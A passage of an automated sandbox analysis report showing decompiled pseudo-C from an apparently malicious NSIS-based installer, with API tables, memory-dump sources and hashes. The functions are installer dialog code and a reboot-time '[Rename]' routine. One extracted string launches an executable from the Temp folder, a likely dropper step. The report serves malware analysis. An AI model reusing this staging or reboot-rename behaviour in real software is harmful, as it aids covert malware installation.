                      						} else {
                      							goto L48;
                      						}
                      					} else {
                      						L48:
                      						if(_a8 != 0x111) {
                      							L56:
                      							if(_a8 == 0x200) {
                      								SendMessageW(_v8, 0x200, 0, 0);
                      							}
                      							if(_a8 == 0x40b) {
                      								_t225 =  *0x42372c;
                      								if(_t225 != 0) {
                      									ImageList_Destroy(_t225);
                      								}
                      								_t226 =  *0x423740;
                      								if(_t226 != 0) {
                      									GlobalFree(_t226);
                      								}
                      								 *0x42372c = 0;
                      								 *0x423740 = 0;
                      								 *0x42a2c0 = 0;
                      							}
                      							if(_a8 != 0x40f) {
                      								L90:
                      								if(_a8 == 0x420 && ( *0x42a279 & 0x00000001) != 0) {
                      									_t324 = (0 | _a16 == 0x00000020) << 3;
                      									ShowWindow(_v8, _t324);
                      									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
                      								}
                      								goto L93;
                      							} else {
                      								E004011EF(_t301, 0, 0);
                      								_t198 = _a12;
                      								if(_t198 != 0) {
                      									if(_t198 != 0xffffffff) {
                      										_t198 = _t198 - 1;
                      									}
                      									_push(_t198);
                      									_push(8);
                      									E00404FFF();
                      								}
                      								if(_a16 == 0) {
                      									L75:
                      									E004011EF(_t301, 0, 0);
                      									_v36 =  *0x423740;
                      									_t201 =  *0x42a288;
                      									_v64 = 0xf030;
                      									_v24 = 0;
                      									if( *0x42a28c <= 0) {
                      										L86:
                      										if( *0x42a31e == 0x400) {
                      											InvalidateRect(_v8, 0, 1);
                      										}
                      										if( *((intOrPtr*)( *0x42923c + 0x10)) != 0) {
                      											E00404F3A(0x3ff, 0xfffffffb, E00404F52(5));
                      										}
                      										goto L90;
                      									}
                      									_t292 = _t201 + 8;
                      									do {
                      										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
                      										if(_t207 != 0) {
                      											_t303 =  *_t292;
                      											_v72 = _t207;
                      											_v76 = 8;
                      											if((_t303 & 0x00000001) != 0) {
                      												_v76 = 9;
                      												_v60 =  &(_t292[4]);
                      												_t292[0] = _t292[0] & 0x000000fe;
                      											}
                      											if((_t303 & 0x00000040) == 0) {
                      												_t211 = (_t303 & 0x00000001) + 1;
                      												if((_t303 & 0x00000010) != 0) {
                      													_t211 = _t211 + 3;
                      												}
                      											} else {
                      												_t211 = 3;
                      											}
                      											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
                      											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
                      											SendMessageW(_v8, 0x113f, 0,  &_v76);
                      										}
                      										_v24 = _v24 + 1;
                      										_t292 =  &(_t292[0x206]);
                      									} while (_v24 <  *0x42a28c);
                      									goto L86;
                      								} else {
                      									_t293 = E004012E2( *0x423740);
                      									E00401299(_t293);
                      									_t222 = 0;
                      									_t301 = 0;
                      									if(_t293 <= 0) {
                      										L74:
                      										SendMessageW(_v12, 0x14e, _t301, 0);
                      										_a16 = _t293;
                      										_a8 = 0x420;
                      										goto L75;
                      									} else {
                      										goto L71;
                      									}
                      									do {
                      										L71:
                      										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
                      											_t301 = _t301 + 1;
                      										}
                      										_t222 = _t222 + 1;
                      									} while (_t222 < _t293);
                      									goto L74;
                      								}
                      							}
                      						}
                      						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                      							goto L93;
                      						} else {
                      							_t232 = SendMessageW(_v12, 0x147, 0, 0);
                      							if(_t232 == 0xffffffff) {
                      								goto L93;
                      							}
                      							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
                      							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
                      								_t294 = 0x20;
                      							}
                      							E00401299(_t294);
                      							SendMessageW(_a4, 0x420, 0, _t294);
                      							_a12 = _a12 | 0xffffffff;
                      							_a16 = 0;
                      							_a8 = 0x40f;
                      							goto L56;
                      						}
                      					}
                      				} else {
                      					_v36 = 0;
                      					_v20 = 2;
                      					 *0x42a2c0 = _t291;
                      					 *0x423740 = GlobalAlloc(0x40,  *0x42a28c << 2);
                      					_t258 = LoadImageW( *0x42a260, 0x6e, 0, 0, 0, 0);
                      					 *0x423734 =  *0x423734 | 0xffffffff;
                      					_t297 = _t258;
                      					 *0x42373c = SetWindowLongW(_v8, 0xfffffffc, E0040563E);
                      					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                      					 *0x42372c = _t260;
                      					ImageList_AddMasked(_t260, _t297, 0xff00ff);
                      					SendMessageW(_v8, 0x1109, 2,  *0x42372c);
                      					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                      						SendMessageW(_v8, 0x111b, 0x10, 0);
                      					}
                      					DeleteObject(_t297);
                      					_t298 = 0;
                      					do {
                      						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
                      						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
                      							if(_t298 != 0x20) {
                      								_v20 = 0;
                      							}
                      							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066A5(_t298, 0, _t326, 0, _t266)), _t298);
                      						}
                      						_t298 = _t298 + 1;
                      					} while (_t298 < 0x21);
                      					_t299 = _a16;
                      					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
                      					_push(0x15);
                      					E004045C4(_a4);
                      					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
                      					_push(0x16);
                      					E004045C4(_a4);
                      					_t300 = 0;
                      					_v16 = 0;
                      					if( *0x42a28c <= 0) {
                      						L19:
                      						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                      						goto L20;
                      					} else {
                      						_t319 = _v24 + 8;
                      						_v32 = _t319;
                      						do {
                      							_t278 =  &(_t319[0x10]);
                      							if( *_t278 != 0) {
                      								_v64 = _t278;
                      								_t279 =  *_t319;
                      								_v88 = _v16;
                      								_t311 = 0x20;
                      								_v84 = 0xffff0002;
                      								_v80 = 0xd;
                      								_v68 = _t311;
                      								_v44 = _t300;
                      								_v72 = _t279 & _t311;
                      								if((_t279 & 0x00000002) == 0) {
                      									if((_t279 & 0x00000004) == 0) {
                      										 *( *0x423740 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                      									} else {
                      										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                      									}
                      								} else {
                      									_v80 = 0x4d;
                      									_v48 = 1;
                      									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                      									_v36 = 1;
                      									 *( *0x423740 + _t300 * 4) = _t284;
                      									_v16 =  *( *0x423740 + _t300 * 4);
                      								}
                      							}
                      							_t300 = _t300 + 1;
                      							_t319 =  &(_v32[0x818]);
                      							_v32 = _t319;
                      						} while (_t300 <  *0x42a28c);
                      						if(_v36 != 0) {
                      							L20:
                      							if(_v20 != 0) {
                      								E004045F9(_v8);
                      								goto L23;
                      							} else {
                      								ShowWindow(_v12, 5);
                      								E004045F9(_v12);
                      								L93:
                      								return E0040462B(_a8, _a12, _a16);
                      							}
                      						}
                      						goto L19;
                      					}
                      				}
                      			}


























































                      0x00405038
                      0x00405051
                      0x00405056
                      0x0040505e
                      0x00405064
                      0x0040507a
                      0x0040507d
                      0x004052a8
                      0x004052af
                      0x004052c3
                      0x004052b1
                      0x004052b3
                      0x004052b6
                      0x004052b7
                      0x004052be
                      0x004052be
                      0x004052cf
                      0x004052dd
                      0x004052e0
                      0x004052f6
                      0x0040536b
                      0x0040536e
                      0x00405370
                      0x0040537a
                      0x00405388
                      0x00405388
                      0x0040538a
                      0x00405394
                      0x0040539a
                      0x0040539d
                      0x004053a0
                      0x004053bb
                      0x004053a2
                      0x004053ac
                      0x004053ac
                      0x004053a0
                      0x00405394
                      0x00000000
                      0x0040536e
                      0x004052fb
                      0x00405306
                      0x0040530b
                      0x00405312
                      0x00405317
                      0x0040531b
                      0x00405326
                      0x00405326
                      0x0040532a
                      0x0040532e
                      0x00405332
                      0x00405345
                      0x00405334
                      0x00405334
                      0x0040533b
                      0x00405341
                      0x0040533d
                      0x0040533d
                      0x0040533d
                      0x0040533b
                      0x00405349
                      0x0040534b
                      0x0040535e
                      0x00405361
                      0x00405364
                      0x00405364
                      0x0040532e
                      0x00000000
                      0x0040531b
                      0x004052fd
                      0x00405304
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004053be
                      0x004053be
                      0x004053c5
                      0x00405436
                      0x0040543e
                      0x00405446
                      0x00405446
                      0x0040544f
                      0x00405451
                      0x00405458
                      0x0040545b
                      0x0040545b
                      0x00405461
                      0x00405468
                      0x0040546b
                      0x0040546b
                      0x00405471
                      0x00405477
                      0x0040547d
                      0x0040547d
                      0x0040548a
                      0x004055eb
                      0x004055f2
                      0x0040560f
                      0x00405615
                      0x00405627
                      0x00405627
                      0x00000000
                      0x00405490
                      0x00405492
                      0x00405497
                      0x0040549c
                      0x004054a1
                      0x004054a3
                      0x004054a3
                      0x004054a4
                      0x004054a5
                      0x004054a7
                      0x004054a7
                      0x004054af
                      0x004054f0
                      0x004054f2
                      0x00405502
                      0x00405505
                      0x0040550a
                      0x00405511
                      0x00405514
                      0x004055b6
                      0x004055bf
                      0x004055c7
                      0x004055c7
                      0x004055d5
                      0x004055e6
                      0x004055e6
                      0x00000000
                      0x004055d5
                      0x0040551a
                      0x0040551d
                      0x00405523
                      0x00405528
                      0x0040552a
                      0x0040552c
                      0x00405532
                      0x00405539
                      0x0040553e
                      0x00405545
                      0x00405548
                      0x00405548
                      0x0040554f
                      0x0040555b
                      0x0040555f
                      0x00405561
                      0x00405561
                      0x00405551
                      0x00405553
                      0x00405553
                      0x00405581
                      0x0040558d
                      0x0040559c
                      0x0040559c
                      0x0040559e
                      0x004055a1
                      0x004055aa
                      0x00000000
                      0x004054b1
                      0x004054bc
                      0x004054bf
                      0x004054c4
                      0x004054c6
                      0x004054ca
                      0x004054da
                      0x004054e4
                      0x004054e6
                      0x004054e9
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004054cc
                      0x004054cc
                      0x004054d2
                      0x004054d4
                      0x004054d4
                      0x004054d5
                      0x004054d6
                      0x00000000
                      0x004054cc
                      0x004054af
                      0x0040548a
                      0x004053cd
                      0x00000000
                      0x004053e3
                      0x004053ed
                      0x004053f2
                      0x00000000
                      0x00000000
                      0x00405404
                      0x00405409
                      0x00405415
                      0x00405415
                      0x00405417
                      0x00405426
                      0x00405428
                      0x0040542c
                      0x0040542f
                      0x00000000
                      0x0040542f
                      0x004053cd
                      0x00405083
                      0x00405088
                      0x00405091
                      0x00405098
                      0x004050aa
                      0x004050b5
                      0x004050bb
                      0x004050c9
                      0x004050dd
                      0x004050e2
                      0x004050ef
                      0x004050f4
                      0x0040510a
                      0x0040511b
                      0x00405128
                      0x00405128
                      0x0040512b
                      0x00405131
                      0x00405133
                      0x00405136
                      0x0040513b
                      0x00405140
                      0x00405142
                      0x00405142
                      0x00405162
                      0x00405162
                      0x00405164
                      0x00405165
                      0x0040516a
                      0x00405170
                      0x00405174
                      0x00405179
                      0x00405181
                      0x00405185
                      0x0040518a
                      0x0040518f
                      0x00405197
                      0x0040519a
                      0x0040526a
                      0x0040527d
                      0x00000000
                      0x004051a0
                      0x004051a3
                      0x004051a6
                      0x004051a9
                      0x004051a9
                      0x004051af
                      0x004051b8
                      0x004051bb
                      0x004051bf
                      0x004051c2
                      0x004051c5
                      0x004051ce
                      0x004051d7
                      0x004051da
                      0x004051dd
                      0x004051e0
                      0x0040521e
                      0x00405249
                      0x00405220
                      0x0040522f
                      0x0040522f
                      0x004051e2
                      0x004051e5
                      0x004051f3
                      0x004051fd
                      0x00405205
                      0x0040520c
                      0x00405217
                      0x00405217
                      0x004051e0
                      0x0040524f
                      0x00405250
                      0x0040525c
                      0x0040525c
                      0x00405268
                      0x00405283
                      0x00405286
                      0x004052a3
                      0x00000000
                      0x00405288
                      0x0040528d
                      0x00405296
                      0x00405629
                      0x0040563b
                      0x0040563b
                      0x00405286
                      0x00000000
                      0x00405268
                      0x0040519a

                      APIs
                      • GetDlgItem.USER32 ref: 00405049
                      • GetDlgItem.USER32 ref: 00405054
                      • GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
                      • LoadImageW.USER32 ref: 004050B5
                      • SetWindowLongW.USER32 ref: 004050CE
                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
                      • SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
                      • DeleteObject.GDI32(00000000), ref: 0040512B
                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
                      • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D
                        • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
                      • GetWindowLongW.USER32(?,000000F0), ref: 0040526F
                      • SetWindowLongW.USER32 ref: 0040527D
                      • ShowWindow.USER32(?,00000005), ref: 0040528D
                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
                      • ImageList_Destroy.COMCTL32(?), ref: 0040545B
                      • GlobalFree.KERNEL32 ref: 0040546B
                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
                      • SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
                      • InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
                      • ShowWindow.USER32(?,00000000), ref: 00405615
                      • GetDlgItem.USER32 ref: 00405620
                      • ShowWindow.USER32(00000000), ref: 00405627
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                      • String ID: $M$N
                      • API String ID: 2564846305-813528018
                      • Opcode ID: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                      • Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
                      • Opcode Fuzzy Hash: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                      • Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 91%
                      			E00404783(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                      				intOrPtr _v8;
                      				int _v12;
                      				void* _v16;
                      				struct HWND__* _t56;
                      				signed int _t75;
                      				signed short* _t76;
                      				signed short* _t78;
                      				long _t92;
                      				int _t103;
                      				signed int _t110;
                      				intOrPtr _t113;
                      				WCHAR* _t114;
                      				signed int* _t116;
                      				WCHAR* _t117;
                      				struct HWND__* _t118;
                      
                      				if(_a8 != 0x110) {
                      					if(_a8 != 0x111) {
                      						L13:
                      						if(_a8 != 0x4e) {
                      							if(_a8 == 0x40b) {
                      								 *0x421714 =  *0x421714 + 1;
                      							}
                      							L27:
                      							_t114 = _a16;
                      							L28:
                      							return E0040462B(_a8, _a12, _t114);
                      						}
                      						_t56 = GetDlgItem(_a4, 0x3e8);
                      						_t114 = _a16;
                      						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                      							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                      							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                      							_v12 = _t103;
                      							_v16 = _t113;
                      							_v8 = 0x428200;
                      							if(_t103 - _t113 < 0x800) {
                      								SendMessageW(_t56, 0x44b, 0,  &_v16);
                      								SetCursor(LoadCursorW(0, 0x7f02));
                      								_push(1);
                      								E00404A32(_a4, _v8);
                      								SetCursor(LoadCursorW(0, 0x7f00));
                      								_t114 = _a16;
                      							}
                      						}
                      						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                      							goto L28;
                      						} else {
                      							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                      								SendMessageW( *0x42a268, 0x111, 1, 0);
                      							}
                      							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                      								SendMessageW( *0x42a268, 0x10, 0, 0);
                      							}
                      							return 1;
                      						}
                      					}
                      					if(_a12 >> 0x10 != 0 ||  *0x421714 != 0) {
                      						goto L27;
                      					} else {
                      						_t116 =  *0x422720 + 0x14;
                      						if(( *_t116 & 0x00000020) == 0) {
                      							goto L27;
                      						}
                      						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                      						E004045E6(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                      						E00404A0E();
                      						goto L13;
                      					}
                      				}
                      				_t117 = _a16;
                      				_t75 =  *(_t117 + 0x30);
                      				if(_t75 < 0) {
                      					_t75 =  *( *0x42923c - 4 + _t75 * 4);
                      				}
                      				_t76 =  *0x42a298 + _t75 * 2;
                      				_t110 =  *_t76 & 0x0000ffff;
                      				_a8 = _t110;
                      				_t78 =  &(_t76[1]);
                      				_a16 = _t78;
                      				_v16 = _t78;
                      				_v12 = 0;
                      				_v8 = E00404734;
                      				if(_t110 != 2) {
                      					_v8 = E004046FA;
                      				}
                      				_push( *((intOrPtr*)(_t117 + 0x34)));
                      				_push(0x22);
                      				E004045C4(_a4);
                      				_push( *((intOrPtr*)(_t117 + 0x38)));
                      				_push(0x23);
                      				E004045C4(_a4);
                      				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                      				E004045E6( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                      				_t118 = GetDlgItem(_a4, 0x3e8);
                      				E004045F9(_t118);
                      				SendMessageW(_t118, 0x45b, 1, 0);
                      				_t92 =  *( *0x42a270 + 0x68);
                      				if(_t92 < 0) {
                      					_t92 = GetSysColor( ~_t92);
                      				}
                      				SendMessageW(_t118, 0x443, 0, _t92);
                      				SendMessageW(_t118, 0x445, 0, 0x4010000);
                      				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                      				 *0x421714 = 0;
                      				SendMessageW(_t118, 0x449, _a8,  &_v16);
                      				 *0x421714 = 0;
                      				return 0;
                      			}


















                      0x00404795
                      0x004048c2
                      0x0040491f
                      0x00404923
                      0x004049f0
                      0x004049f2
                      0x004049f2
                      0x004049f8
                      0x004049f8
                      0x004049fb
                      0x00000000
                      0x00404a02
                      0x00404931
                      0x00404937
                      0x00404941
                      0x0040494c
                      0x0040494f
                      0x00404952
                      0x0040495d
                      0x00404960
                      0x00404967
                      0x00404974
                      0x00404985
                      0x0040498b
                      0x00404993
                      0x004049a1
                      0x004049a7
                      0x004049a7
                      0x00404967
                      0x004049b1
                      0x00000000
                      0x004049bc
                      0x004049c0
                      0x004049d0
                      0x004049d0
                      0x004049d6
                      0x004049e2
                      0x004049e2
                      0x00000000
                      0x004049e6
                      0x004049b1
                      0x004048cd
                      0x00000000
                      0x004048df
                      0x004048e4
                      0x004048ea
                      0x00000000
                      0x00000000
                      0x00404913
                      0x00404915
                      0x0040491a
                      0x00000000
                      0x0040491a
                      0x004048cd
                      0x0040479b
                      0x0040479e
                      0x004047a3
                      0x004047b4
                      0x004047b4
                      0x004047bc
                      0x004047bf
                      0x004047c3
                      0x004047c6
                      0x004047ca
                      0x004047cd
                      0x004047d0
                      0x004047d3
                      0x004047da
                      0x004047dc
                      0x004047dc
                      0x004047e6
                      0x004047f3
                      0x004047fd
                      0x00404802
                      0x00404805
                      0x0040480a
                      0x00404821
                      0x00404828
                      0x0040483b
                      0x0040483e
                      0x00404852
                      0x00404859
                      0x0040485e
                      0x00404863
                      0x00404863
                      0x00404871
                      0x0040487f
                      0x00404891
                      0x00404896
                      0x004048a6
                      0x004048a8
                      0x00000000

                      APIs
                      • CheckDlgButton.USER32 ref: 00404821
                      • GetDlgItem.USER32 ref: 00404835
                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
                      • GetSysColor.USER32(?), ref: 00404863
                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
                      • lstrlenW.KERNEL32(?), ref: 00404884
                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
                      • GetDlgItem.USER32 ref: 004048FF
                      • SendMessageW.USER32(00000000), ref: 00404906
                      • GetDlgItem.USER32 ref: 00404931
                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
                      • LoadCursorW.USER32(00000000,00007F02), ref: 00404982
                      • SetCursor.USER32(00000000), ref: 00404985
                      • LoadCursorW.USER32(00000000,00007F00), ref: 0040499E
                      • SetCursor.USER32(00000000), ref: 004049A1
                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2
                      Strings
                      • "C:\Users\user~1\AppData\Local\Temp\rnixgfly.exe" C:\Users\user~1\AppData\Local\Temp\somvwkehjlp.rt, xrefs: 00404960
                      • N, xrefs: 0040491F
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                      • String ID: "C:\Users\user~1\AppData\Local\Temp\rnixgfly.exe" C:\Users\user~1\AppData\Local\Temp\somvwkehjlp.rt$N
                      • API String ID: 3103080414-3455428766
                      • Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                      • Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
                      • Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                      • Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E004062AE(void* __ecx) {
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				long _t12;
                      				long _t24;
                      				char* _t31;
                      				int _t37;
                      				void* _t38;
                      				intOrPtr* _t39;
                      				long _t42;
                      				WCHAR* _t44;
                      				void* _t46;
                      				void* _t48;
                      				void* _t49;
                      				void* _t52;
                      				void* _t53;
                      
                      				_t38 = __ecx;
                      				_t44 =  *(_t52 + 0x14);
                      				 *0x426de8 = 0x55004e;
                      				 *0x426dec = 0x4c;
                      				if(_t44 == 0) {
                      					L3:
                      					_t2 = _t52 + 0x1c; // 0x4275e8
                      					_t12 = GetShortPathNameW( *_t2, 0x4275e8, 0x400);
                      					if(_t12 != 0 && _t12 <= 0x400) {
                      						_t37 = wsprintfA(0x4269e8, "%ls=%ls\r\n", 0x426de8, 0x4275e8);
                      						_t53 = _t52 + 0x10;
                      						E004066A5(_t37, 0x400, 0x4275e8, 0x4275e8,  *((intOrPtr*)( *0x42a270 + 0x128)));
                      						_t12 = E00406158(0x4275e8, 0xc0000000, 4);
                      						_t48 = _t12;
                      						 *(_t53 + 0x18) = _t48;
                      						if(_t48 != 0xffffffff) {
                      							_t42 = GetFileSize(_t48, 0);
                      							_t6 = _t37 + 0xa; // 0xa
                      							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                      							if(_t46 == 0 || E004061DB(_t48, _t46, _t42) == 0) {
                      								L18:
                      								return CloseHandle(_t48);
                      							} else {
                      								if(E004060BD(_t38, _t46, "[Rename]\r\n") != 0) {
                      									_t49 = E004060BD(_t38, _t21 + 0xa, "\n[");
                      									if(_t49 == 0) {
                      										_t48 =  *(_t53 + 0x18);
                      										L16:
                      										_t24 = _t42;
                      										L17:
                      										E00406113(_t24 + _t46, 0x4269e8, _t37);
                      										SetFilePointer(_t48, 0, 0, 0);
                      										E0040620A(_t48, _t46, _t42 + _t37);
                      										GlobalFree(_t46);
                      										goto L18;
                      									}
                      									_t39 = _t46 + _t42;
                      									_t31 = _t39 + _t37;
                      									while(_t39 > _t49) {
                      										 *_t31 =  *_t39;
                      										_t31 = _t31 - 1;
                      										_t39 = _t39 - 1;
                      									}
                      									_t24 = _t49 - _t46 + 1;
                      									_t48 =  *(_t53 + 0x18);
                      									goto L17;
                      								}
                      								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                      								_t42 = _t42 + 0xa;
                      								goto L16;
                      							}
                      						}
                      					}
                      				} else {
                      					CloseHandle(E00406158(_t44, 0, 1));
                      					_t12 = GetShortPathNameW(_t44, 0x426de8, 0x400);
                      					if(_t12 != 0 && _t12 <= 0x400) {
                      						goto L3;
                      					}
                      				}
                      				return _t12;
                      			}



















                      0x004062ae
                      0x004062b7
                      0x004062be
                      0x004062c8
                      0x004062dc
                      0x00406304
                      0x0040630b
                      0x0040630f
                      0x00406313
                      0x00406333
                      0x0040633a
                      0x00406344
                      0x00406351
                      0x00406356
                      0x0040635b
                      0x0040635f
                      0x0040636e
                      0x00406370
                      0x0040637d
                      0x00406381
                      0x0040641c
                      0x00000000
                      0x00406397
                      0x004063a4
                      0x004063c8
                      0x004063cc
                      0x004063eb
                      0x004063ef
                      0x004063ef
                      0x004063f1
                      0x004063fa
                      0x00406405
                      0x00406410
                      0x00406416
                      0x00000000
                      0x00406416
                      0x004063ce
                      0x004063d1
                      0x004063dc
                      0x004063d8
                      0x004063da
                      0x004063db
                      0x004063db
                      0x004063e3
                      0x004063e5
                      0x00000000
                      0x004063e5
                      0x004063af
                      0x004063b5
                      0x00000000
                      0x004063b5
                      0x00406381
                      0x0040635f
                      0x004062de
                      0x004062e9
                      0x004062f2
                      0x004062f6
                      0x00000000
                      0x00000000
                      0x004062f6
                      0x00406427

                      APIs
                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406449,?,?), ref: 004062E9
                      • GetShortPathNameW.KERNEL32 ref: 004062F2
                        • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                        • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                      • GetShortPathNameW.KERNEL32 ref: 0040630F
                      • wsprintfA.USER32 ref: 0040632D
